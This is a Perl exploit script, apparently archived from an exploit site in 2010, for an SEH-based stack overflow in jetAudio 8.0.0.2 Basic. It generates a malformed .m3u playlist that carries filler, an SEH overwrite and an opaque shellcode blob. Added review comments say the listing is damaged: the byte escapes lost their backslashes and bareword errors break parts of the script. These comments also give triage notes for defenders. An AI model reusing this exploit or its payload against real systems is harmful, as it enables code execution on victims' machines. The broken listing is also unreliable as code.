jetaudio8002-overflow.txt
Posted on 22 January 2010
#!/usr/bin/perl
# Title: jetAudio 8.0.0.2 Basic (m3u) Stack Overflow Exploit
# Author: cr4wl3r <cr4wl3r[!]linuxmail.org>
# Tested: Windows xp(sp2)
#########################################
#
# Purpose: builds a malformed .m3u playlist whose single entry is one overlong
# "http://" string, then writes it to disk. Per the title, the target is the
# playlist parser of jetAudio 8.0.0.2 Basic; the header lists Windows XP SP2
# as the only tested platform.
#
# NOTE(review): this listing is extraction-damaged. The whole script was
# collapsed onto one line, and every "x.." sequence below appears without a
# leading backslash, so as written Perl treats them as plain text rather than
# byte escapes. A file generated from this listing will not match the bytes or
# hashes of a file generated from the author's original script.
#
# Triage notes for defenders: a playlist entry of this shape (a URL-like line
# far longer than 1000 characters with no line break) is anomalous on its own
# and can be flagged without inspecting the trailing bytes. The variable names
# below suggest a structured-exception-handler overwrite, presumably the class
# of bug that SafeSEH/SEHOP and DEP are meant to blunt -- TODO confirm against
# the vendor advisory, which this page does not cite.

# Output file name for the generated playlist.
my $file="b00m.m3u";
# Prefix that makes the entry look like a stream URL.
my $header = "http://";
# 1017 filler characters placed between the prefix and the next two fields.
my $junk = "A" x 1017;
# Named for the "next SEH" field of an exception record (inferred from the
# name only). As listed this is the 12-character text shown, not 4 raw bytes.
my $nseh = "xebx06x90x90";
# 32-bit little-endian packing of a fixed address. The page does not say which
# module the address belongs to.
my $seh = pack('V',0x01221045);
# Opaque payload blob. Its behaviour is not described anywhere on the page, so
# treat it as untrusted; as listed it is literal ASCII text (see note above).
my $shellcode = "x33xC9x83xE9xB0xD9xEExD9x74x24xF4x5Bx81x73x13".
"xA8x45xF5xB8x83xEBxFCxE2xF4x54x2Fx1ExF5x40xBC".
"x0Ax47x57x25x7ExD4x8Cx61x7ExFDx94xCEx89xBDxD0".
"x44x1Ax33xE7x5Dx7ExE7x88x44x1ExF1x23x71x7ExB9".
"x46x74x35x21x04xC1x35xCCxAFx84x3FxB5xA9x87x1E".
"x4Cx93x11xD1x90xDDxA0x7ExE7x8Cx44x1ExDEx23x49".
"xBEx33xF7x59xF4x53xABx69x7Ex31xC4x61xE9xD9x6B".
"x74x2ExDCx23x06xC5x33xE8x49x7ExC8xB4xE8x7ExF8".
"xA0x1Bx9Dx36xE6x4Bx19xE8x57x93x93xEBxCEx2DxC6".
"x8AxC0x32x86x8AxF7x11x0Ax68xC0x8Ex18x44x93x15".
"x0Ax6ExF7xCCx10xDEx29xA8xFDxBAxFDx2FxF7x47x78".
"x2Dx2CxB1x5DxE8xA2x47x7Ex16xA6xEBxFBx16xB6xEB".
"xEBx16x0Ax68xCEx2Dx35xB8xCEx16x7Cx59x3Dx2Dx51".
"xA2xD8x82xA2x47x7Ex2FxE5xE9xFDxBAx25xD0x0CxE8".
"xDBx51xFFxBAx23xEBxFDxBAx25xD0x4Dx0Cx73xF1xFF".
"xBAx23xE8xFCx11xA0x47x78xD6x9Dx5FxD1x83x8CxEF".
"x57x93xA0x47x78x23x9FxDCxCEx2Dx96xD5x21xA0x9F".
"xE8xF1x6Cx39x31x4Fx2FxB1x31x4Ax74x35x4Bx02xBB".
"xB7x95x56x07xD9x2Bx25x3FxCDx13x03xEEx9DxCAx56".
"xF6xE3x47xDDx01x0Ax6ExF3x12xA7xE9xF9x14x9FxB9".
"xF9x14xA0xE9x57x95x9Dx15x71x40x3BxEBx57x93x9F".
"x47x57x72x0Ax68x23x12x09x3Bx6Cx21x0Ax6ExFAxBA".
"x25xD0x47x8Bx15xD8xFBxBAx23x47x78x45xF5xB8";
# Trailing filler of "E" characters.
# NOTE(review): the names inside length() carry no "$" sigil, so without
# `use strict` they are bareword strings and the call measures their
# 20-character concatenation, not the variables of the same names.
my $footer="E" x (2000-length(junk.nseh.seh.shellcode));
# Final entry: prefix, filler, the two record fields, payload blob, filler.
my $payload = $header.$junk.$nseh.$seh.$shellcode.$footer;
print " Writing payload to file ";
# NOTE(review): two-argument open with a bareword handle and no error check;
# a failed open is silent and the later print/close operate on a closed handle.
open(sploitf,">$file");
print sploitf $payload;
close(sploitf);
# `b00m` is a bareword here and prints as the literal text "b00m"; it is not
# the value of $file.
print " Exploit file " . b00m . " created ";
# Reports the total size of the generated entry.
print " b00m " . length($payload) . " bytes ";